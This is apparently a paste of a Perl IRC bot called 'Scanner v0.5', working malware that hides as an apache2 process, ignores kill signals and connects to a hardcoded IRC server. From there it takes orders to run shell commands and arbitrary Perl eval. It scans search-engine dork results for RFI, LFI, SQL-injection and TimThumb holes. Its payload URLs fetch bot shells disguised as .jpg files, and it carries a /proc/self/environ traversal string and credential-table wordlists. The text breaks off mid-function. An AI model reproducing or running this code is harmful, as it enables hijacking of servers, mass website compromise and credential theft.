Bot

1. #!/usr/bin/perl
2. ####### DON'T MODIF IT or SCRIPT NOT WORK #######
3. $powered="FathurFreakz"; #
4. $mail="fathurfreakz@gmail.com"; #
5. #################################################
6. #################################################
7. use HTTP::Request; #
8. use HTTP::Request::Common; #
9. use HTTP::Request::Common qw(POST); #
10. use LWP::Simple; #
11. use LWP 5.53; #
12. use LWP::UserAgent; #
13. use Socket; #
14. use IO::Socket; #
15. use IO::Socket::INET; #
16. use IO::Select; #
17. #################################################
18.  
19.  
20. my $datetime = localtime;
21. my $fakeproc = "/usr/sbin/apache2 -k start";
22. my $ircserver = "93.191.130.153";
23. my $ircport = "7000";
24. my $nickname = "[SCAN]_Anu[".int(rand(100))."]";
25. my $ident = "FathurFreakz";
26. my $channel = "#anu";
27. my $admin = "FathurFreakz";
28. my $fullname = "FathurFreakz";
29. my $nickserv = "NickServ";
30.  
31. #########################################################
32. my $zerologo = "15(4@9ZeroBoard15)"; #
33. my $thumblogo = "15(4@9TimThumb15)"; #
34. my $nob0dy = "14(7@2nob0dy14)";
35. my $lfilogo = "14(7@2LFI14)";
36. my $rfilogo = "14(7@2RFI14)";
37. my $e107logo = "14(7@2e10714)";
38. my $xmllogo = "14(7@2XML14)";
39. my $sqllogo = "14(7@2SQL14)";
40. my $oscologo = "14(7@2OSCommerce14)";
41. my $zenlogo = "14(7@2zen14)";
42. my $cubelogo = "14(7@2cube14)";
43. my $admlogo = "14(7@2adm14)";
44. my $smslogo = "14(7@2sms14)";
45. my $ossqllogo = "14(7@2OSCO-Result14)";
46. my $zerocmd = '!zero'; #
47. my $lficmd = '!lfi';
48. my $rficmd = '!rfi';
49. my $e107cmd = '!e107';
50. my $xmlcmd = '!xml';
51. my $sqlcmd = '!mysql';
52. my $oscocmd = '!osco';
53. my $zencmd = '!zen';
54. my $admcmd = '!adm';
55. my $opcmd = '!op';
56. my $ossqlcmd = '!ossql';
57. my $esqlcmd = '!esql';
58. my $oscoauto = '!auto';
59. my $cmdlfi = '!cmdlfi';
60. my $cmde107 = '!cmde107';
61. my $cmdxml = '!cmdxml';
62. my $timcmd = '!tim';
63. my $zeroshell = "ada di hatimu"; #
64. #############################################################################################################
65. my $action = "/data/shell.php?cmd=lwp-download%20http://200.98.132.177/myid.php;"; #
66. my $thumbshell = "http://200.98.132.177/myid.php"; #
67. my $thumbbot = "http://chelmsfordmartialarts.com/jwplayer/rei2.txt"; #
68. my $injector = "http://www.quakelounge.de/images/ipays.jpg";
69. my $botshell = "http://www.quakelounge.de/images/byroe.jpg";
70. my $botshell2 = "http://www.quakelounge.de/images/allnet.jpg";
71. my $folder1 = "/cache/ac8d8248c4b732b4c0555434e2b8e752.php"; #
72. my $folder2 = "/cache/external_ac8d8248c4b732b4c0555434e2b8e752.php"; #
73. my $folder3 = "/temp/ac8d8248c4b732b4c0555434e2b8e752.php"; #
74. my $folder4 = "/temp/external_ac8d8248c4b732b4c0555434e2b8e752.php"; #
75. my $folder5 = "/wp-content/uploads/thumb-temp/ac8d8248c4b732b4c0555434e2b8e752.php"; #
76. my $folderx1 = "/cache/ac8d8248c4b732b4c0555434e2b8e752.php"; #
77. my $folderx2 = "/cache/external_ac8d8248c4b732b4c0555434e2b8e752.php"; #
78. my $folderx3 = "/temp/ac8d8248c4b732b4c0555434e2b8e752.php"; #
79. my $folderx4 = "/temp/external_1874d1ebe81ba5ab9b157f592eccec13.php"; #
80. my $folderx5 = "/wp-content/uploads/thumb-temp/a1255cd56ad18c804806afc5c802ffb9.php"; #
81. #############################################################################################################
82. my @uagents = ("Microsoft Internet Explorer/4.0b1 (Windows 95)",
83. "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)",
84. "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)",
85. "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)",
86. "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)",
87. "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)",
88. "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)",
89. "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)",
90. "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)",
91. "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
92. "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)",
93. "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)",
94. "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)",
95. "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)",
96. "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)",
97. "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)",
98. "Microsoft Pocket Internet Explorer/0.6",
99. "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)",
100. "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;",
101. "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)",
102. "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)",
103. "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)",
104. "Advanced Browser (http://www.avantbrowser.com)",
105. "Avant Browser (http://www.avantbrowser.com)",
106. "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)",
107. "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)",
108. "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007",
109. "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511",
110. "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929",
111. "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0",
112. "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox",
113. "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5",
114. "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6",
115. "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6",
116. "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7",
117. "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7",
118. "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4",
119. "Mozilla/3.0 (OS/2; U)",
120. "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)",
121. "Mozilla/4.61 (Macintosh; I; PPC)",
122. "Mozilla/4.61 [en] (OS/2; U)",
123. "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)",
124. "Mozilla/4.8 [en] (Windows NT 5.0; U)",
125. "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)",
126. "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4",
127. "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7",
128. "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4",
129. "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5",
130. "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1",
131. "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1",
132. "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1",
133. "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1",
134. "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1",
135. "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2",
136. "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0",
137. "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b",
138. "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0",
139. "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Mobile/7D11",
140. "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7D11 Safari/528.16",
141. "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16",
142. "Mozilla/5.0 (iPhone; U; CPU iPhone OS 2_2_1 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5H11 Safari/525.20",
143. "Mozilla/5.0 (iPod; U; CPU iPhone OS 3_1 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Mobile/7C106c",
144. "Mozilla/5.0 (iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/7D11",
145. "Mozilla/5.0 (Linux; U; Android 2.1-update1; en-gb; Desire_A8181 Build/ERE27) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17",
146. "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) BlackBerry8707/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/150",
147. "Mozilla/5.0 (Linux; U; Android 1.6; en-gb; HTC Magic Build/DRC92) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
148. "Alcatel-OH5/1.0 UP.Browser/6.1.0.7.7 (GUI) MMP/1.0",
149. "BlackBerry8800/4.5.0.69 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/123",
150. "BlackBerry8310/4.5.0.55 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/212",
151. "blackberry8520_ver1_subvodafone",
152. "BlackBerry9000/4.6.0.126 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/-1",
153. "BlackBerry9700/5.0.0.405 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/102",
154. "Nokia3110c/2.0 (07.21) Profile/MIDP-2.0 Configuration/CLDC-1.1",
155. "Nokia6300/2.0 (07.00) Profile/MIDP-2.0 Configuration/CLDC-1.1",
156. "Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es61i",
157. "NokiaE61i-1/3.0 (1.0633.62.05) SymbianOS/9.1 Series60/3.0 Profile/MIDP-2.0 Configuration/CLDC-1.1",
158. "Mozilla/5.0(SymbianOS/9.2; U; Series60/3.1 NokiaN82/10.0.035; Profile/MIDP-2.0 Configuration/CLDC-1.1;) AppleWebKit/413(KHTML, like Gecko)Safari/413",
159. "Mozilla/5.0 (SymbianOS/9.3; U; Series60/3.2 NokiaN85-1/30.101; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413",
160. "Mozilla/5.0 (SymbianOS/9.2 U; Series60/3.1 NokiaN95_8GB/10.0.007; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413",
161. "Mozilla/5.0 (webOS/1.0; U; en-US) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/1.0 Safari/525.27.1 Pre/1.0",
162. "Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.13337/504; U; ru) Presto/2.2.0",
163. "SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1",
164. "Samsung-SPHM540 Polaris/6.0 MMP/2.0 Profile/MIDP-2.0 Configuration/CLDC-1.1",
165. "Mozilla/4.0 (MobilePhone SCP-6600/US/1.0) NetFront/3.1 MMP/2.0",
166. "SonyEricssonC902/R3EA Browser/NetFront/3.4 Profile/MIDP-2.1 Configuration/CLDC-1.1 JavaPlatform/JP-8.3.3",
167. "SonyEricssonK800i/R1AA Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
168. "SonyEricssonV600i/R2K Browser/SEMC-Browser/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1",
169. "Mozilla/5.0 (Linux; U; Android 1.6; en-gb; SonyEricssonX10i Build/R1FA016) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
170. "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
171. "Gigabot/3.0 (http://www.gigablast.com/spider.html)");
172. my $uagent = $uagents[rand(scalar(@uagents))];
173.  
174. my $lfdtest = "../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00";
175. my $open_test = "/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html";
176. my $adm_output = ("uid=");
177. my $open_output = ("FCKeditor - Connectors Tests");
178.  
179. my @tabele = ('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario',
180. 'name','names','nombre','nombres','usuarios','member','members','admin_table','miembro','miembros','membername','admins','administrator',
181. 'administrators','passwd','password','passwords','pass','Pass','tAdmin','tadmin','user_password','user_passwords','user_name','user_names',
182. 'member_password','mods','mod','moderators','moderator','user_email','user_emails','user_mail','user_mails','mail','emails','email','address',
183. 'e- mail','emailaddress','correo','correos','phpbb_users','log','logins','login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass',
184. 'tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador','tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id' ,
185. 'sistema_usuario','sistema_password','contrasena','auth','key','senha','tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member',
186. 'tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization','membros','utilizadores','staff','nuke_authors','accounts','account','accnts',
187. 'associated','accnt','customers','customer','membres','administrateur','utilisateur','tuser','tusers','utilisateurs','password','amministratore','god','God','authors',
188. 'asociado','asociados','autores','membername','autor','autores','Users','Admin','Members','Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','US UARIO','USUARIOS','MIEMBROS','MIEMBRO');
189. my @kolumny = ('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email',
190. 'user_name','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail',
191. 'usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','login_id','usr','sistema_id','author',
192. 'sistema_usuario','auth','key','membername','nme','unme','psw','password','user_password','autores','pass_hash','hash','pass','correo',
193. 'userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors',
194. 'user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username');
195.  
196. $SIG{'INT'} = 'IGNORE';
197. $SIG{'HUP'} = 'IGNORE';
198. $SIG{'TERM'} = 'IGNORE';
199. $SIG{'CHLD'} = 'IGNORE';
200. $SIG{'PS'} = 'IGNORE';
201. chdir("/tmp");
202. #chop (my $priper = `wget http://www.quakelounge.de/images/ipays.jpg -O ipays.jpg;wget http://www.quakelounge.de/images/allnet.jpg -O allnet.jpg;wget http://www.quakelounge.de/images/byroe.jpg -O byroe.jpg`);
203. $ircserver = "$ARGV[0]" if $ARGV[0];
204. $0 = "$fakeproc"."\0" x 16;;
205. my $pid = fork;
206. exit if $pid;
207. die "\n[!] Something Wrong !!!: $!\n\n" unless defined($pid);
208.  
209. our %irc_servers;
210. our %DCC;
211. my $dcc_sel = new IO::Select->new();
212. $sel_client = IO::Select->new();
213. sub sendraw {
214. if ($#_ == '1') {
215. my $socket = $_[0];
216. print $socket "$_[1]\n";
217. } else {
218. print $IRC_cur_socket "$_[0]\n";
219. }
220. }
221. my @domen = ("site:.org","site:.info","site:.net","site:.com","site:.edu","site:.mil","site:.int","site:.gov","site:.ar","site:.au","site:.az","site:.be","site:.br","site:.ca","si te:.ch","site:.de","site:.dk","site:.ee","site:.es","site:.eu","site:.fr","site:.gr","site:.gu","site:.hk","site:.ht","site:.hu","site:.id","site:.il","site:.ir","site :.is","site:.it","site:.jp","site:.kh","site:.ki","site:.kr","site:.la","site:.li","site:.ls","site:.me","site:.mk","site:.mo","site:.mn","site:.mt","site:.na","site:. nc","site:.ni","site:.nl","site:.no","site:.nr","site:.nu","site:.om","site:.pa","site:.ph","site:.pl","site:.pn","site:.pr","site:.ps","site:.pt","site:.py","site:.qa ","site:.re","site:.ro","site:.rs","site:.ru","site:.sa","site:.se","site:.sh","site:.si","site:.sk","site:.sl","site:.so","site:.sr","site:.st","site:.su","site:.th", "site:.tk","site:.tr","site:.tt","site:.tv","site:.ua","site:.uk","site:.us","site:.za");
222. sub connector {
223. my $mynick = $_[0];
224. my $ircserver_con = $_[1];
225. my $ircport_con = $_[2];
226. my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1);
227. if (defined($IRC_socket)) {
228. $IRC_cur_socket = $IRC_socket;
229. $IRC_socket->autoflush(1);
230. $sel_client->add($IRC_socket);
231. $irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con";
232. $irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con";
233. $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
234. $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost;
235. nick("$mynick");
236. my $versi = "Rei @ iniaku.net.tc";
237. sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$versi");
238. sleep (1);}}
239. sub parse {
240. my $servarg = shift;
241. if ($servarg =~ /^PING \:(.*)/) {
242. sendraw("PONG :$1");
243. }
244. elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
245. if (lc($1) eq lc($mynick)) {
246. $mynick = $4;
247. $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
248. }
249. }
250. elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
251. nick("$mynick".int rand(1));
252. }
253. elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
254. $mynick = $2;
255. $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
256. $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
257. sendraw("MODE $mynick +iB");
258. sendraw("JOIN $channel");
259. sleep(2);
260. sendraw("MODE $mynick +Bx");
261. sendraw("PRIVMSG $nickserv :identify jancox");sleep(2);
262. sendraw("JOIN $channel");sleep(0);
263. sendraw("PRIVMSG $admin :Hi $admin im here !!!");
264. sendraw("PRIVMSG $channel :8%9,8%8,9%3,9%1,3%3,1%9,1 Private Scanner Engine V.5 LucAs_Over Modification 3,1%1,3%3,9%8,9%9,8%8%");
265. sendraw("PRIVMSG $channel :Todos Modes Funcionando 100%");sleep(0);
266. sendraw("PRIVMSG $channel :LucAs_Over Meu Mestre .. Vamos Hackia !!!");
267. }
268. }
269. my $line_temp;
270. while( 1 ) {
271. while (!(keys(%irc_servers))) { &connector("$nickname", "$ircserver", "$ircport"); }
272. select(undef, undef, undef, 0.01);;
273. delete($irc_servers{''}) if (defined($irc_servers{''}));
274. my @ready = $sel_client->can_read(0);
275. next unless(@ready);
276. foreach $fh (@ready) {
277. $IRC_cur_socket = $fh;
278. $mynick = $irc_servers{$IRC_cur_socket}{'nick'};
279. $nread = sysread($fh, $ircmsg, 4096);
280. if ($nread == 0) {
281. $sel_client->remove($fh);
282. $fh->close;
283. delete($irc_servers{$fh});
284. }
285. @lines = split (/\n/, $ircmsg);
286. $ircmsg =~ s/\r\n$//;
287.  
288. if ($ircmsg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
289. my ($nick,$ident,$host,$path,$msg) = ($1,$2,$3,$4,$5);
290. my $engine ="GooGLe,ReDiff,Bing,ALtaViSTa,AsK,UoL,CluSty,GutSer,GooGle2,ExaLead,VirgiLio,WebDe,AoL,SaPo,DuCk,YauSe,BaiDu,KiPoT,GiBLa,YahOo,HotBot,LyCos,LyGo,BLacK,oNeT,SiZuka,WaL La,DeMos,RoSe,SeZnaM,TisCali,NaVeR,DooGatE,SoGoU,InTeRiA,SnZ,YaNdEx,JoEaNt,TeRrA,YoUdAo,AmFiBi,BiGcLiQuE,DaNcEfLoOr,LiVe,RaKuTeN,BiGlObE,NoVa,NaJdI,GoO,UkSuBmIt,ExCiTe ,MaMMa";
291. if ($path eq $mynick) {
292. if ($msg =~ /^
     PING (.*)
     /) {
293. sendraw("NOTICE $nick :
     PING $1
     ");
294. }
295. if ($msg =~ /^
     VERSION
     /) {
296. sendraw("NOTICE $nick :VERSION mIRC v6.17 Khaled Mardam-Bey");
297. }
298. if ($msg =~ /^
     TIME
     /) {
299. sendraw("NOTICE $nick :
     TIME ".$datetime."
     ");
300. }
301. if (&isAdmin($nick) && $msg eq "!die") {
302. &shell("$path","kill -9 $$");
303. }
304. if (&isAdmin($nick) && $msg eq "!killall") {
305. &shell("$path","killall -9 perl");
306. }
307. if (&isAdmin($nick) && $msg eq "!reset") {
308. sendraw("QUIT :Restarting...");
309. }
310. if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {
311. sendraw("JOIN #".$1);
312. }
313. if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {
314. sendraw("PART #".$1);
315. }
316. if (&isAdmin($nick) && $msg =~ /^!nick (.+)/) {
317. sendraw("NICK ".$1);
318. }
319. if (&isAdmin($nick) && $msg =~ /^!pid/) {
320. sendraw($IRC_cur_socket, "PRIVMSG $nick :9Fake Process/PID : $fakeproc - $$");
321. }
322. if (&isAdmin($nick) && $msg !~ /^!/) {
323. &shell("$nick","$msg");
324. }
325. }
326. else {
327. if (&isAdmin($nick) && $msg eq "!die") {
328. &shell("$path","kill -9 $$");
329. }
330. if (&isAdmin($nick) && $msg eq "!killall") {
331. &shell("$path","killall -9 perl");
332. }
333. if (&isAdmin($nick) && $msg eq "!reset") {
334. sendraw("QUIT :Restarting...");
335. }
336. if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {
337. sendraw("JOIN #".$1);
338. }
339. if (&isAdmin($nick) && $msg eq "!part") {
340. sendraw("PART $path");
341. }
342. if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {
343. sendraw("PART #".$1);
344. }
345. if (&isAdmin($nick) && $msg =~ /^\.sh (.*)/) {
346. &shell("$path","$1");
347. }
348. if (&isAdmin($nick) && $msg =~ /^$mynick (.*)/) {
349. &shell("$path","$1");
350. }
351. if (&isAdmin($nick) && $msg =~ /^!eval (.*)/) {
352. eval "$1";
353. }
354.  
355. ##################################################################### HELP COMMAND
356.  
357. if ($msg=~ /^!help/) {
358. my $helplogo = "15(4@9Help15)";
359. &msg("$path","$helplogo 8%9,8%8,9%3,9%1,3%3,1%9,1[ LucAs_Over Help Options True Community ]3,1%1,3%3,9%8,9%9,8%8%");
360. &msg("$path","$helplogo 3 ( $rficmd |$lficmd|$sqlcmd|$xmlcmd|New add: $timcmd | $zerocmd [bug] [dork] )");
361. &msg("$path","$helplogo 4 ( $cmde107 |$cmdlfi|$cmdxml) [target][cmd]|!sms[no][pesan] )");
362. &msg("$path","$helplogo 6 ( $e107cmd | $zencmd | $oscocmd | $admcmd | $cubecmd [dork] | !dns [host] ) ");sleep(2);
363. &msg("$path","$helplogo 7 ( !login [web] |!port [ip][port]|!base64 [data] | !ip [ip] )");
364. &msg("$path","$helplogo 13 ( !about |!engine|!version|!proxy [3digit]|!paypal [email] )");
365. &msg("$path","$helplogo 8%9,8%8,9%3,9%1,3%3,1%9,1[ END Of HELP Option ]3,1%1,3%3,9%8,9%9,8%8%");
366. }
367. if ($msg=~ /^!engine/) {
368. my $enginelogo = "15(4@9EnginE15)";
369. &msg("$path","$enginelogo 4 GooGLe,ReDiff,Bing,ALtaViSTa,AsK,UoL,CluSty,GutSer,GooGle2,ExaLead,VirgiLio");
370. &msg("$path","$enginelogo 4 WebDe,AoL,SaPo,DuCk,YauSe,BaiDu,KiPoT,GiBLa,YahOo,HotBot,LyCos,LyGo");
371. &msg("$path","$enginelogo 4 BLacK,oNeT,SiZuka,WaLLa,DeMos,RoSe,SeZnaM,TisCali,NaVeR");
372. }
373. if ($msg=~ /^!about/) {
374. my $aboutlogo = "15(4@9About Bot15)";
375. &msg("$path","$aboutlogo 9Wordpress / Scanner v0.5 ");
376. &msg("$path","$aboutlogo 9© Copy Right 2011 LucAs_Over");
377. }
378. if ($msg=~ /^!version/) {
379. my $versionlogo = "15(4@9Version15)";
380. &msg("$path","$versionlogo 13 Scanner v0.5");
381. }
382. if ($msg=~ /^!respon/ || $msg=~ /^!id/) {
383. if (&isFound($injector,"Rei Area")) {
384. &msg("$path","15(7@2Checker15)2 Injektor Umum 9Worked ON - Mestre LucAs_Over !!!");
385. } else {
386. &msg("$path","15(7@2Checker15)2 Injektor Umum 4Worked OFF - Mestre LucAs_Over !!!");
387. }
388. if (&isFound($thumbshell,"GIF89a")) {
389. &msg("$path","15(7@2Checker15)2 Injektor Thumb 9Worked ON - Mestre LucAs_Over !!!");
390. } else {
391. &msg("$path","15(7@2Checker15)2 Injektor Thumb4Worked OFF - Mestre LucAs_Over !!!");
392. }
393. }
394. if (&isAdmin($nick) && $msg =~ /^!pid/) {
395. &notice("$nick","9Fake Process/PID : 8$fakeproc - $$");
396. }
397.  
398. ################################ Zeroboard #####################################
399.  
400. if ($msg=~ /^$zerocmd\s+(.+?)\s+(.*)/) {
401. if (my $pid = fork) {
402. waitpid($pid, 0);
403. }
404. else {
405. if (fork) { exit; } else {
406. my ($bug,$dork) = ($1,$2);
407. &msg("$path","$zerologo 9Dork :4 $dork");
408. &msg("$path","$zerologo 13Bugz :4 $bug");
409. &msg("$path","$zerologo 8Search Engine Loading ...");
410. &scan_start($path,$bug,$dork,$engine,2);
411. }
412. exit;
413. }
414. }
415. #####################################################################
416.  
417. if ($msg=~ /^$timcmd\s+(.+?)\s+(.*)/) {
418. if (my $pid = fork) {
419. waitpid($pid, 0);
420. }
421. else {
422. if (fork) { exit; } else {
423. my ($bug,$dork) = ($1,$2);
424. &msg("$path","$thumblogo 9Dork :4 $dork");
425. &msg("$path","$thumblogo 13Bugz :4 $bug");
426. &msg("$path","$thumblogo 8Search Engine Loading ...");
427. &scan_start($path,$bug,$dork,$engine,1);
428. }
429. exit;
430. }
431. }
432.  
433. if ($msg=~ /^!proxy\s+(.+)/){
434. if (my $pid = fork) { waitpid($pid, 0); } else {
435. if (fork) { exit; } else {
436. my $minta = $1;
437. &msg("$path","15(7@2PROXY15)13 Checking Proxy..");
438. &proxy($path,$minta);
439. }
440. exit;
441. }
442. }
443.  
444. if ($msg=~ /^!dns\s+(.*)/){
445. my $nsku = $1;
446. $mydns = inet_ntoa(inet_aton($nsku));
447. &msg("$path", "15(7@2DNS15) 13$nsku 9Resolve Ke 4 $mydns");
448. }
449.  
450. if ($msg=~ /^!port\s+(.*?)\s+(.*)/ ) {
451. my $hostip= "$1";
452. my $portsc= "$2";
453. my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $portsc, Proto =>'tcp', Timeout => 7);
454. if ($scansock) {
455. &msg("$path","15(7@2PORT15)7 $hostip : $portsc 9Diterima !");
456. }
457. else {
458. &msg("$path","15(7@2PORT15)7 $hostip : $portsc 4Koneksi Ditolak !");
459. }
460. }
461.  
462. if ($msg=~ /^!ip\s+(.*)/ ) {
463. if (my $pid = fork) { waitpid($pid, 0); } else {
464. if (fork) { exit; } else {
465. my $ip = $1;
466. &msg("$path","15(7@2IP15)6 Searching ".$ip." 9Location ...");
467. my $website = "http://www.ipligence.com/geolocation";
468. my ($useragent,$request,$response,%form);
469. undef %form;
470. $form{ip} = $ip;
471. $useragent = LWP::UserAgent->new;
472. $useragent->timeout(5);
473. $request = POST $website,\%form;
474. $response = $useragent->request($request);
475. if ($response->is_success) {
476. my $res = $response->content;
477. if ($res =~ m/Your IP address is(.*)<br>City:(.*)<br\/>Country:(.*)<br>Continent:(.*)<br>Time/g) {
478. my ($ipaddress,$city,$country,$continent) = ($1,$2,$3,$4);
